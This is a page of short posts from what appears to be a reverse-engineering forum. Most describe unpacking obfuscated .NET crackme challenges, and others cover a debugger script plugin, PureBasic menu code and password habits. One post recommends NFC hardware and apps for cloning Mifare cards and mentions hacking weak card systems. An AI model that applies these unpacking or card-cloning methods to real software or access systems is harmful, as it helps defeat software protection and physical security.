    after a few months, I decided to try again and I have finally unpacked it!
    steps:
    1. decrypted strings for parameter.
    2. converted str that is actually an int value.
    3. resolved all sizeOfs.
    4. converted reference proxy calli to normal calls and removed the proxy calls.
    5. Removed some Cflow.
    6. calculated the integer values that use xor to get the value.
    7. decrypted all the strings.
    8. cleaned cflows and the rest and also renamed.
    Credits: Tesla - Helping remove cflow
    crack-me_obfuscated_Unpacked.exe
  35. 1 point
    https://www.zdnet.com/article/hacker-holding-git-repositories-for-ransom/ https://security.stackexchange.com/questions/209448/gitlab-account-hacked-and-repo-wiped == Download all of your GitHub data - https://github.com/settings/admin
  36. 1 point
    Unpacked!
    1. Used dnspy to remove antitamper and the calls
    2. converted all integer values that have something to do with strings, ex: "epic".Length (my tool)
    3. Resolved all SizeOf values with my tool
    4. Calculated all math calls like Math.Truncate or Math.log10 with my tool
    5. used de4dot to calculate the remaining stuff to get the field values.
    6. grabbed the field values and removed the fields (marked as empty Types) with my tool
    7. removed the cos and junk call that will always return 0 with any uint value you use in the parameter, also marked as empty Types (my tool)
    8. cleaned the rest of math calculations with de4dot
    9. TheProxy used his cflow killer to kill all the cflow
    Credits: TheProxy - Helping to remove the Cflow; Mighty - helped me to get the types from operand (for sizeOf resolver); Autori and Blank - for tips
    pass: 1830
    Screenshot:
    File: CrackMe3-StrToIntResolved-SizeOfRemoved-SysMathCallFixed-cleaned-EmptyTypesRemoved-EmptyTypesRemoved-cleaned_unpacked-StringDec-Cleaned.exe
  37. 1 point
    Language : .NET Platform : Windows x86 OS Version : All Packer / Protector : ConfuserEx Modded Description : Can you see the code? UnPackMe.exe
  38. 1 point
    No File->Load ??? Or the ability to run a script txt file?
  39. 1 point
    AdvancedScript_3.1 - fix CheckHexIsValid ( fix length ). - add menu to (copy - follow - delete) variables . - add more check for StrAnalyze. - add MsgBox for if command in a case does not resolve arguments. note : copy can copy one value or all values in case Array variables AdvancedScript_3.1.zip Script.zip
  40. 1 point
    Hi, so I don't like that dark color value because it's aggressive and of course it looks very dumb too. I like decent bright colors, which are also better for the eyes. Bright background / dark text is fine. Dark background / bright text is bad. Firefox handles the private tab mode better without changing the theme color in the working area/s (tabs / bars), just putting a small private mode logo in the bar, which doesn't disturb anyone, you know. But changing the whole theme color in this mode like Opera / Brave etc. do isn't really acceptable without asking the user for permission. Sorry, but it's really stupid. They also put a private logo into the bar, so why do they also change the color theme!? The logo is enough so everyone can see this. Sometimes less is more. Of course it's just my opinion. greetz
  41. 1 point
    useless ... offline I think it is better https://chrome.google.com/webstore/detail/quick-bookmark-cleaner/ljfgijlbekebdhniagdekklbmmchhjja
  42. 1 point
    GetMenuString function works fine, refer to the code snippet below...

    cchMax = GetMenuString_(hMenu, (wParam & $ffff), #Null, #Null, #MF_BYCOMMAND)
    cchMax = cchMax + 1
    lpString.s = Space(cchMax)
    GetMenuString_(hMenu, (wParam & $ffff), @lpString.s, cchMax, #MF_BYCOMMAND)
    Debug lpString.s

    I suspect what you are trying to do is read text in the menu that has previously been drawn using the DrawText function. GetMenuString will not find these strings, you will have to work something else out. If the intention of using GetMenuString is a way of identifying a menu item that has been clicked on I think this is not the best way to go about it. When you add a menu item you should already know its position ID and the text that has been added. You can add and use this information in your array. When the menu item is clicked on you can find the position ID in wParam. You should then be able to use this as the reference point in your array... Ted.
  43. 1 point
    If you have a look at my DrawTextColoured procedure in my previous example and the one below you can see how I change the text colour and calculate the required positioning in the menu. The example (below) uses AppendMenu function to add items in to the owner drawn menu. It then adds the new item in to the menu array. You can also see how to add an icon/image in to these menu items. I included an example on how you can process menu events from WM_COMMAND. I suggest having a read through the Windows developers documents regarding menus, particularly the About section. https://docs.microsoft.com/en-au/windows/desktop/menurc/menus I have compiled the example for you this time in x32... Ted. Appended Menu Items.exe
  44. 1 point
    If you think a website is not worthy of a unique and strong password you may as well use a 10 minute throwaway email address to register - or a shared account. I think it good practice to be encouraging users in general and of websites to use and enforce unique and strong passwords. A website may be valuable to you and not to others. The option shouldn't be left open for a person whom values a site risk losing it from using a weak password because there are other users out there that don't care what they use... Ted.
  45. 1 point
    your password is tesfaw https://gyazo.com/37e85be8307829270736eb42156ed9f5 as kao said this isnt unbreakable at all
  46. 1 point
    If you look for a good reader for your PC get yourself a Proxmark3, and if you just want to look into Mifare 1K just get a cheap ACR122U from eBay. If you want to have fun get yourself an Arduino or RPi with a PN532 module; it's capable of reading Mifare 1K and I already had fun with it too, hacking a few weak card systems and making a portable NFC card cloner with this module from Adafruit, but there are alternatives which are cheaper. If you have a smartphone capable of NFC reading you can try Android apps such as Tag NFC Cloner, which work fine too. edit: related to credit card reading I don't know, but I'm sure something should exist on GitHub.
  47. 1 point
    Unpacked Use any long key to pass checks. GetMe_unp.zip
  48. 1 point
    Just check the IAT start & end / size manually in Olly and correct it if needed, and then you are on the safe side. No big deal to do this quickly by yourself without always blindly trusting any import tool. In this case ImpRec shows all correctly, but ImpRec can also fail etc. Just wanna say that you should verify the found and shown results, you know. greetz
  49. 1 point
  50. 1 point